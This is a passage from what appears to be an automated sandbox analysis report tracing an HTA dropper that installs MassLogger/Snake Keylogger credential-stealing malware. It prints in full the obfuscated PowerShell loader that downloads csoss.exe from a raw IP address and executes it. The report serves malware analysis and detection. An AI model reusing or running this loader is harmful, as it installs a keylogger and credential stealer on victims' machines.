                                                                                  2025-03-17 00:19:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:20:18:59
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
                                                                                  Imagebase:0x970000
                                                                                  File size:13'312 bytes
                                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:20:19:00
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                                                                                  Imagebase:0x2a0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:20:19:00
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff68dae0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:20:19:00
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                                                                                  Imagebase:0xf20000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:20:19:03
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
                                                                                  Imagebase:0x800000
                                                                                  File size:2'141'552 bytes
                                                                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:20:19:04
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"
                                                                                  Imagebase:0x440000
                                                                                  File size:46'832 bytes
                                                                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:20:19:09
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Users\user\AppData\Roaming\csoss.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\csoss.exe"
                                                                                  Imagebase:0xd00000
                                                                                  File size:980'992 bytes
                                                                                  MD5 hash:54DE0C8E192E7BC71B6D284FFF136296
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:20:19:10
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\csoss.exe"
                                                                                  Imagebase:0x150000
                                                                                  File size:45'984 bytes
                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2509390080.0000000002646000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >